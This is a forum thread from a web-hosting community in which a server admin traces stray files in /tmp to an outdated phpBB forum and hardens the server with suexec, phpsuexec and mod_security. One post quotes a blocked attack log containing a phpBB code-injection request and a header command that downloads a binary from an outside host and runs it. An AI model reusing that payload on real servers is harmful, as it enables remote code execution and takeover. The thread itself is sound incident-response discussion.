Who sent up this file?

#1 07-18-2005, 07:42 PM

How can I find out who uploaded a file?

I've been getting a lot of crap in my /tmp directory. This afternoon I found bd, and a bunch of bd.1, bd.2, etc files. Plus bash. I deleted them all, this evening I found another bash. It shows it's owned by "nobody".

Is there any way I can find out who sent this file up? And would somebody be able to send something up to my /tmp directory?

Fred · #2 07-18-2005, 07:58 PM

it was uploaded by apache.
you should check if your tmp is secure... i.e. no ability to execute file.

You should write support about it. They sure have something for you.

personnaly, i'm using php with phpsuexec and suexec for cgi,perl files... so i think i would be able to find who is doing it because i think everyfile will be owned by the user.... You should think about enabling these protections.

But first ask support@ they can help you for sure... Don't wait!!

#3 07-18-2005, 08:02 PM

Quote:

Originally Posted by Fred

it was uploaded by apache.
you should check if your tmp is secure... i.e. no ability to execute file.

You should write support about it. They sure have something for you.

personnaly, i'm using php with phpsuexec and suexec for cgi,perl files... so i think i would be able to find who is doing it because i think everyfile will be owned by the user.... You should think about enabling these protections.

But first ask support@ they can help you for sure... Don't wait!!

I opened a ticket, already got a response. ;-)

They said that one of my domains running phpBB is using an old module, it'll have to be upgraded to the latest.

Fred · #4 07-18-2005, 08:09 PM

ok, the phpbb module was abused ?

A lot of hosts is banning phpbb forum from their servers... see: http://www.webhostingtalk.com/showth...hreadid=424624

IMO, we shouldn't ban... but we must stay aware of any updates and security risks... Run modsecurity... and *force* the user to update to the latest version.

I was thinking about modifying my term of service to include something about updates and latest version...

#5 07-18-2005, 08:29 PM

Quote:

Originally Posted by Fred

personnaly, i'm using php with phpsuexec and suexec for cgi,perl files... so i think i would be able to find who is doing it because i think everyfile will be owned by the user.... You should think about enabling these protections.

I already have suexec enabled (according to cPanel). How do I enable phpsuexec?

#6 07-18-2005, 08:54 PM

Quote:

Originally Posted by mikelbeck

I already have suexec enabled (according to cPanel). How do I enable phpsuexec?

Never mind, I found it.

Fred · #7 07-18-2005, 08:59 PM

i think it need to be enabled when you compile apache... See the software section in whm and look for apache update ... you can see a lot of options from that place.

I'm not pretty sure i enabled it from there... so again, you should ask support or ... wait here for a reply or try google

Fred · #8 07-18-2005, 09:00 PM

good then :P

#9 07-18-2005, 10:20 PM

Yeah, it looks like there's (yet another) phpBB bug. The site that's being attacked is on 2.0.15, I know the latest is 2.0.16 and I've told the admin he has to update it ASAP.

I've enabled suexec, phpsuexec and mod_security. Actually, mod_security was already installed, I just tightened it up a bit. And it looks like I've stopped the attack for the time being:

Quote:

========================================
Request: 69.58.0.69 - - [18/Jul/2005:22:10:22 -0400] "GET /forums/viewtopic.php?t=535&view=next&highlight='.system(g etenv(HTTP_PHP)).' HTTP/1.0" 403 632
Handler: server-parsed
----------------------------------------
GET /forums/viewtopic.php?t=535&view=next&highlight='.system(g etenv(HTTP_PHP)).' HTTP/1.0
Accept: */*
Host: www.....com
PHP: cd /tmp;wget www.nordicfiber.com/~racer/libs;mv libs bash;chmod 777 bash;./bash
User-Agent: Mozilla/4.0
mod_security-message: Access denied with code 403. Pattern match "'" at THE_REQUEST.
mod_security-action: 403

HTTP/1.0 403 Forbidden
Connection: close
Content-Type: text/html

I tightened it up a little too much, a user on another site PM'd me to say they couldn't post at all. I was trapping " ' ", which was no good, now I've got it looking for ".system" (among others). That should do it.

Fred · #10 07-18-2005, 11:40 PM

Cool... they were trying

But it's probably a bot... most of them are i think.

i've found a website with good mod_security rules... http://www.eth0.us/?q=mod_security

it's important to tests them( i don't have the time for testing... and reading those logs... ) ... because It could break lot of scripts...

See what rules you currently run ( check in your httpd.conf for rules location... Check for includes in the included rules file... I think i have two files for the mod_sec rules... one is mine as user.conf (i think)..
and the other comes from a powervps cron job... ( with a pretty good and standard set of rules... Updated probably when a new vulnerability comes out ... I'ts pretty cool. )